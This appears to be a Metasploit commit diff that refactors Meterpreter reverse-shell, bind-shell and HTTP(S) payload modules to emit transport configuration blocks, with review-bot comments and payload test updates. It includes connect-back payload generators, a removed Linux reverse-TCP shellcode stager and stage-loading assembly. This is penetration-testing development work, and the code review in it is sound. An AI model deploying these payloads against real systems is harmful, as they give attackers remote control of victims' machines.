exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end


@ -4,16 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/windows/x64/stageless_meterpreter'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x64_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 1102498
include Msf::Payload::Windows::StagelessMeterpreter_x64
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader_x64
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -35,9 +40,32 @@ module Metasploit4
end
def generate
# blank LHOST indicates bind payload
url = "tcp://:#{datastore['LPORT']}"
generate_stageless_x64(url)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X64
)
end
# create the configuration block, which for staged connections is really simple.
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_bind_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end


@ -4,18 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_http'
require 'msf/core/handler/reverse_http/stageless'
require 'msf/core/payload/windows/x64/stageless_meterpreter'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x64_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 1103542
include Msf::Payload::Windows::StagelessMeterpreter_x64
include Msf::Handler::ReverseHttp::Stageless
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader_x64
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -31,17 +34,38 @@ module Metasploit4
'Session' => Msf::Sessions::Meterpreter_x64_Win
))
initialize_stageless
register_options([
OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
], self.class)
end
def generate
# generate a stageless payload using the x64 version of
# the stageless generator
opts = {
:ssl => false,
:generator => method(:generate_stageless_x64)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X64
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_http(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
generate_stageless(opts)
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end


@ -4,18 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_https'
require 'msf/core/handler/reverse_http/stageless'
require 'msf/core/payload/windows/x64/stageless_meterpreter'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x64_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 1103542
include Msf::Payload::Windows::StagelessMeterpreter_x64
include Msf::Handler::ReverseHttp::Stageless
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader_x64
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -31,17 +34,38 @@ module Metasploit4
'Session' => Msf::Sessions::Meterpreter_x64_Win
))
initialize_stageless
register_options([
OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
], self.class)
end
def generate
# generate a stageless payload using the x64 version of
# the stageless generator
opts = {
:ssl => true,
:generator => method(:generate_stageless_x64)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X64
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_http(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
generate_stageless(opts)
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end
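Review bot: This x64 reverse_https module builds its transport with `transport_config_reverse_http(opts)`, while the x86 reverse_https counterpart in this commit calls `transport_config_reverse_https(opts)` and this file itself requires `msf/core/handler/reverse_https`; unless the http helper derives the scheme from the handler, the generated configuration will describe a plain-HTTP transport and the session will connect back without TLS. The line should read `transports: [transport_config_reverse_https(opts)],`. The x64 reverse_http module in this commit uses the http helper correctly, so this looks like a copy-paste slip rather than an intended difference.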


@ -4,16 +4,21 @@
##
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/x64/stageless_meterpreter'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x64_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 1102498
include Msf::Payload::Windows::StagelessMeterpreter_x64
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader_x64
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -36,8 +41,32 @@ module Metasploit4
end
def generate
url = "tcp6://#{datastore['LHOST']}:#{datastore['LPORT']}?#{datastore['SCOPEID']}"
generate_stageless_x64(url)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X64
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_ipv6_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end


@ -5,15 +5,20 @@
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/x64/stageless_meterpreter'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x64_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module Metasploit4
CachedSize = :dynamic
CachedSize = 1102498
include Msf::Payload::Windows::StagelessMeterpreter_x64
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::MeterpreterLoader_x64
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -35,8 +40,32 @@ module Metasploit4
end
def generate
url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
generate_stageless_x64(url)
stage_meterpreter(true) + generate_config
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new(
platform: 'windows',
arch: ARCH_X64
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end


@ -10,7 +10,7 @@ require 'msf/core/payload/linux/bind_tcp'
module Metasploit4
CachedSize = :dynamic
CachedSize = 110
include Msf::Payload::Stager
include Msf::Payload::Linux::BindTcp
@ -19,7 +19,7 @@ module Metasploit4
super(merge_info(info,
'Name' => 'Bind TCP Stager (Linux x86)',
'Description' => 'Listen for a connection (Linux x86)',
'Author' => [ 'skape', 'egypt', ],
'Author' => [ 'skape', 'egypt' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,


@ -6,83 +6,25 @@
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/linux/reverse_tcp'
module Metasploit4
###
#
# ReverseTcp
# ----------
#
# Linux reverse TCP stager.
#
###
module Metasploit3
CachedSize = 71
CachedSize = 193
include Msf::Payload::Stager
include Msf::Payload::Linux
include Msf::Payload::Linux::ReverseTcp
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse TCP Stager',
'Description' => 'Connect back to the attacker',
'Author' => [
'skape', # original
'egypt', # NX support
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Stager' =>
{
'Offsets' =>
{
'LHOST' => [ 0x12, 'ADDR' ],
'LPORT' => [ 0x19, 'n' ],
},
'Payload' =>
"\x31\xdb" +# xor ebx,ebx
"\xf7\xe3" +# mul ebx
"\x53" +# push ebx
"\x43" +# inc ebx
"\x53" +# push ebx
"\x6a\x02" +# push byte +0x2
"\xb0\x66" +# mov al,0x66
"\x89\xe1" +# mov ecx,esp
"\xcd\x80" +# int 0x80
"\x97" +# xchg eax,edi
"\x5b" +# pop ebx
"\x68\x7f\x00\x00\x01" +# push dword 0x100007f
"\x68\x02\x00\xbf\xbf" +# push dword 0xbfbf0002
"\x89\xe1" +# mov ecx,esp
"\x6a\x66" +# push byte +0x66
"\x58" +# pop eax
"\x50" +# push eax
"\x51" +# push ecx
"\x57" +# push edi
"\x89\xe1" +# mov ecx,esp
"\x43" +# inc ebx
"\xcd\x80" +# int 0x80
"\xb2\x07" +# mov dl,0x7
"\xb9\x00\x10\x00\x00" +# mov ecx,0x1000
"\x89\xe3" +# mov ebx,esp
"\xc1\xeb\x0c" +# shr ebx,0xc
"\xc1\xe3\x0c" +# shl ebx,0xc
"\xb0\x7d" +# mov al,0x7d
"\xcd\x80" +# int 0x80
"\x5b" +# pop ebx
"\x89\xe1" +# mov ecx,esp
"\x99" +# cdq
"\xb6\x0c" +# mov dh,0xc
"\xb0\x03" +# mov al,0x3
"\xcd\x80" +# int 0x80
"\xff\xe1" # jmp ecx
}
))
'Name' => 'Reverse TCP Stager',
'Description' => 'Connect back to the attacker',
'Author' => [ 'skape', 'egypt' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Stager' => { 'Payload' => '' }))
end
end


@ -10,7 +10,7 @@ require 'msf/core/payload/windows/bind_tcp'
module Metasploit4
CachedSize = :dynamic
CachedSize = 285
include Msf::Payload::Stager
include Msf::Payload::Windows::BindTcp


@ -11,7 +11,7 @@ require 'msf/core/payload/windows/reverse_winhttp'
module Metasploit3
CachedSize = 327
CachedSize = 329
include Msf::Payload::Stager
include Msf::Payload::Windows


@ -11,7 +11,7 @@ require 'msf/core/payload/windows/reverse_winhttps'
module Metasploit3
CachedSize = 347
CachedSize = 349
include Msf::Payload::Stager
include Msf::Payload::Windows


@ -10,7 +10,7 @@ require 'msf/core/payload/windows/x64/bind_tcp'
module Metasploit4
CachedSize = :dynamic
CachedSize = 479
include Msf::Payload::Stager
include Msf::Payload::Windows::BindTcp_x64


@ -5,12 +5,14 @@
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_https'
module Metasploit3
CachedSize = 578
include Msf::Payload::TransportConfig
include Msf::Payload::Stager
include Msf::Payload::Windows
@ -91,6 +93,13 @@ module Metasploit3
))
end
#
# Generate the transport-specific configuration
#
def transport_config(opts={})
transport_config_reverse_https(opts)
end
#
# Do not transmit the stage over the connection. We handle this via HTTPS
#


@ -10,7 +10,7 @@ require 'msf/core/payload/windows/x64/reverse_tcp'
module Metasploit4
CachedSize = :dynamic
CachedSize = 437
include Msf::Payload::Stager
include Msf::Payload::Windows::ReverseTcp_x64


@ -8,17 +8,14 @@ require 'msf/base/sessions/meterpreter_x86_linux'
require 'msf/base/sessions/meterpreter_options'
require 'rex/elfparsey'
# Provides methods to patch options into the metsrv stager.
require 'rex/payloads/meterpreter/patch'
module Metasploit3
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Meterpreter',
'Description' => 'Staged meterpreter server',
'Author' => ['PKS', 'egypt'],
'Description' => 'Inject the meterpreter server payload (staged)',
'Author' => ['PKS', 'egypt', 'OJ Reeves'],
'Platform' => 'linux',
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,
@ -35,6 +32,7 @@ module Metasploit3
return ep
end
=begin
def elf2bin(payload)
# XXX, not working. Use .c version
@ -64,31 +62,76 @@ module Metasploit3
print_status("Converted ELF file to memory layout, #{payload.length} to #{used} bytes")
return mem[0, used]
end
=end
def handle_intermediate_stage(conn, payload)
# Does a mmap() / read() loop of a user specified length, then
# jumps to the entry point (the \x5a's)
entry_offset = elf_ep(payload)
config_offset = payload.length - generate_meterpreter.length
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
midstager <<
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
"\x04\x6a\x07\x5a\x6a\x32\x5e\x31\xff\x89\xfd\x4f\xcd\x80\x3d\x7f" +
"\xff\xff\xff\x72\x05\x31\xc0\x40\xcd\x80\x87\xd1\x87\xd9\x5b\x6a" +
"\x03\x58\xcd\x80\x3d\x7f\xff\xff\xff\x77\xea\x85\xc0\x74\xe6\x01" +
"\xc1\x29\xc2\x75\xea\x6a\x59\x53\xb8\x5a\x5a\x5a\x5a\xff\xd0\xe9" +
"\xd1\xff\xff\xff"
# Patch in debug options
midstager = midstager.sub("Y", [ datastore['DebugOptions'] ].pack('C'))
# Patch entry point
midstager = midstager.sub("ZZZZ", [ elf_ep(payload) ].pack('V'))
encoded_entry = "0x%.8x" % entry_offset
encoded_offset = "0x%.8x" % config_offset
encoded_debug_options = "0x%.2x" % datastore['DebugOptions'].to_i
# Maybe in the future patch in base.
# Does a mmap() / read() loop of a user specified length, then
# jumps to the entry point (the \x5a's)
midstager_asm = %Q^
midstager:
and esp, 0xFFFFF254
push 0x4
pop edx
mov ecx, esp
mov ebx, edi
push 0x3
pop eax
int 0x80
push edi
mov eax, 0xC0
mov ebx, 0x20040000
mov ecx, dword ptr [esp+0x4]
push 0x7
pop edx
push 0x32
pop esi
xor edi, edi
mov ebp, edi
dec edi
int 0x80
cmp eax, 0xFFFFFF7F
jb start_read
terminate:
xor eax, eax
inc eax
int 0x80 ; sys_exit
start_read:
xchg ecx, edx
xchg ecx, ebx
pop ebx
read_loop:
push 0x3
pop eax
int 0x80 ; sys_read
cmp eax, 0xFFFFFF7F
ja terminate ; exit on error
test eax, eax
je terminate ; exit on error
add ecx, eax
sub edx, eax
jne read_loop ; read more
; edx should be at the end, but we need to adjust for the size of the config
; block so we know where to write the socket to memory
sub ecx, #{encoded_offset}
mov [ecx], ebx ; write the socket to the config
push #{encoded_debug_options}
push ecx ; pass in the configuration pointer
mov eax, #{encoded_entry} ; put the entry point in eax
call eax
jmp terminate
^
midstager = Metasm::Shellcode.assemble(Metasm::X86.new, midstager_asm).encode_string
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
conn.put(midstager)
Rex::ThreadSafe.sleep(1.5)
@ -100,14 +143,40 @@ module Metasploit3
end
def generate_stage
blob = MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
meterpreter = generate_meterpreter
config = generate_config
meterpreter + config
end
Rex::Payloads::Meterpreter::Patch.patch_timeouts!(blob,
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i)
def generate_meterpreter
blob = MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
blob
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new({
:platform => 'linux',
:arch => ARCH_X86
})
end
# create the configuration block, which for staged connections is really simple.
config_opts = {
:arch => opts[:uuid].arch,
:exitfunk => nil,
:expiration => datastore['SessionExpirationTimeout'].to_i,
:uuid => opts[:uuid],
:transports => [transport_config(opts)],
:extensions => [],
:ascii_str => true
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end
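Review bot: `generate_config` writes into the caller's hash (`opts[:uuid] = Msf::Payload::UUID.new(...)` in the `unless opts[:uuid]` branch), so a caller that passes its own options hash gets a UUID silently inserted into it; the same pattern is repeated in the windows x86 and x64 meterpreter stage sections below. A local avoids the side effect and keeps `transport_config` seeing the same UUID: `uuid = opts[:uuid] || Msf::Payload::UUID.new(:platform => 'linux', :arch => ARCH_X86)`, then `:arch => uuid.arch`, `:uuid => uuid` and `:transports => [transport_config(opts.merge(:uuid => uuid))]` in `config_opts`. Separately, `handle_intermediate_stage` derives `config_offset` by calling `generate_meterpreter` again, which re-reads `msflinker_linux_x86.bin` from disk only to take its length; the intermediate stager's `sub ecx, #{encoded_offset}` then depends on that second read matching the blob already embedded in `payload`, so computing the offset once in `generate_stage` (or memoizing the blob, `@meterpreter_blob ||= MetasploitPayloads.read(...)`) would be more robust. `handle_intermediate_stage` continues past the end of its hunk, so the remainder of that method was not reviewed.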


@ -5,19 +5,21 @@
require 'msf/core'
require 'msf/core/payload/windows/reflectivedllinject'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x86_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
###
#
# Injects the meterpreter server DLL via the Reflective Dll Injection payload
# along with transport related configuration.
#
###
module Metasploit3
module Metasploit4
include Msf::Payload::Windows::ReflectiveDllInject
include Msf::Payload::Windows::MeterpreterLoader
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -28,14 +30,35 @@ module Metasploit3
'PayloadCompat' => { 'Convention' => 'sockedi', },
'License' => MSF_LICENSE,
'Session' => Msf::Sessions::Meterpreter_x86_Win))
# Don't let people set the library name option
options.remove_option('LibraryName')
options.remove_option('DLL')
end
def library_path
MetasploitPayloads.meterpreter_path('metsrv','x86.dll')
def stage_payload(opts={})
stage_meterpreter + generate_config(opts)
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new({
:platform => 'windows',
:arch => ARCH_X86
})
end
# create the configuration block, which for staged connections is really simple.
config_opts = {
:arch => opts[:uuid].arch,
:exitfunk => datastore['EXITFUNC'],
:expiration => datastore['SessionExpirationTimeout'].to_i,
:uuid => opts[:uuid],
:transports => [transport_config(opts)],
:extensions => []
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end
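Review bot: The new `stage_payload` and `generate_config` methods carry no method-level comment, although this file documents with `#` blocks (see the module header just above) and the sibling linux stage annotates each step. A one-liner on `stage_payload` would do: `# Stage body: the meterpreter server image (stage_meterpreter, from the loader mixin) followed by its transport configuration block.` The `stage_meterpreter` implementation is not visible in this commit, so the note about where it comes from is inferred from the `MeterpreterLoader` include and should be confirmed.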


@ -5,37 +5,60 @@
require 'msf/core'
require 'msf/core/payload/windows/x64/reflectivedllinject'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x64_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
###
#
# Injects the x64 meterpreter server DLL via the Reflective Dll Injection payload
# along with transport related configuration.
#
###
module Metasploit3
module Metasploit4
include Msf::Payload::Windows::ReflectiveDllInject_x64
include Msf::Payload::Windows::MeterpreterLoader_x64
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Meterpreter (Reflective Injection x64)',
'Description' => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64)',
'Author' => [ 'sf' ],
'Author' => ['skape','sf', 'OJ Reeves'],
'PayloadCompat' => { 'Convention' => 'sockrdi', },
'License' => MSF_LICENSE,
'Session' => Msf::Sessions::Meterpreter_x64_Win))
# Don't let people set the library name option
options.remove_option('LibraryName')
options.remove_option('DLL')
end
def library_path
MetasploitPayloads.meterpreter_path('metsrv','x64.dll')
def stage_payload(opts={})
stage_meterpreter + generate_config(opts)
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new({
:platform => 'windows',
:arch => ARCH_X64
})
end
# create the configuration block, which for staged connections is really simple.
config_opts = {
:arch => opts[:uuid].arch,
:exitfunk => datastore['EXITFUNC'],
:expiration => datastore['SessionExpirationTimeout'].to_i,
:uuid => opts[:uuid],
:transports => [transport_config(opts)],
:extensions => []
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end
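Review bot: `generate_config` here is a line-for-line copy of the x86 version in the previous section, differing only in `ARCH_X64`; both files already include a shared loader module, so the config construction would be better hoisted there with the arch passed in (the loader mixins are not visible in this commit, so where exactly it fits is inferred). The `'Author' => ['skape','sf', 'OJ Reeves']` literal mixes spacing after commas; `['skape', 'sf', 'OJ Reeves']` matches the rest of the file.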


@ -1348,7 +1348,7 @@ describe 'modules/payloads', :content do
'stagers/linux/x86/bind_tcp',
'stages/linux/x86/meterpreter'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/x86/meterpreter/bind_tcp'
end
@ -1455,7 +1455,7 @@ describe 'modules/payloads', :content do
'stagers/linux/x86/bind_tcp',
'stages/linux/x86/shell'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/x86/shell/bind_tcp'
end
@ -2285,7 +2285,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/dllinject'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/dllinject/bind_tcp'
end
@ -2498,7 +2498,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/meterpreter_bind_tcp'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/meterpreter_bind_tcp'
end
@ -2508,7 +2508,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/meterpreter_reverse_http'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/meterpreter_reverse_http'
end
@ -2518,7 +2518,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/meterpreter_reverse_https'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/meterpreter_reverse_https'
end
@ -2528,7 +2528,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/meterpreter_reverse_ipv6_tcp'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/meterpreter_reverse_ipv6_tcp'
end
@ -2538,7 +2538,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/meterpreter_reverse_tcp'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/meterpreter_reverse_tcp'
end
@ -2571,7 +2571,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/meterpreter'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/meterpreter/bind_tcp'
end
@ -2789,7 +2789,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/patchupdllinject'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/patchupdllinject/bind_tcp'
end
@ -2932,7 +2932,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/patchupmeterpreter'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/patchupmeterpreter/bind_tcp'
end
@ -3075,7 +3075,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/shell'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/shell/bind_tcp'
end
@ -3268,7 +3268,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/upexec'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/upexec/bind_tcp'
end
@ -3411,7 +3411,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/vncinject'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/vncinject/bind_tcp'
end
@ -3552,7 +3552,7 @@ describe 'modules/payloads', :content do
'stagers/windows/x64/bind_tcp',
'stages/windows/x64/meterpreter'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter/bind_tcp'
end
@ -3574,7 +3574,7 @@ describe 'modules/payloads', :content do
'stagers/windows/x64/reverse_tcp',
'stages/windows/x64/meterpreter'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter/reverse_tcp'
end
@ -3584,7 +3584,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/x64/meterpreter_bind_tcp'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter_bind_tcp'
end
@ -3594,7 +3594,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/x64/meterpreter_reverse_http'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter_reverse_http'
end
@ -3604,7 +3604,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/x64/meterpreter_reverse_https'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter_reverse_https'
end
@ -3614,7 +3614,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/x64/meterpreter_reverse_ipv6_tcp'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter_reverse_ipv6_tcp'
end
@ -3624,7 +3624,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/x64/meterpreter_reverse_tcp'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter_reverse_tcp'
end
@ -3635,7 +3635,7 @@ describe 'modules/payloads', :content do
'stagers/windows/x64/bind_tcp',
'stages/windows/x64/shell'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/shell/bind_tcp'
end
@ -3646,7 +3646,7 @@ describe 'modules/payloads', :content do
'stagers/windows/x64/reverse_tcp',
'stages/windows/x64/shell'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/shell/reverse_tcp'
end
@ -3677,7 +3677,7 @@ describe 'modules/payloads', :content do
'stagers/windows/x64/bind_tcp',
'stages/windows/x64/vncinject'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/vncinject/bind_tcp'
end
@ -3688,7 +3688,7 @@ describe 'modules/payloads', :content do
'stagers/windows/x64/reverse_tcp',
'stages/windows/x64/vncinject'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/vncinject/reverse_tcp'
end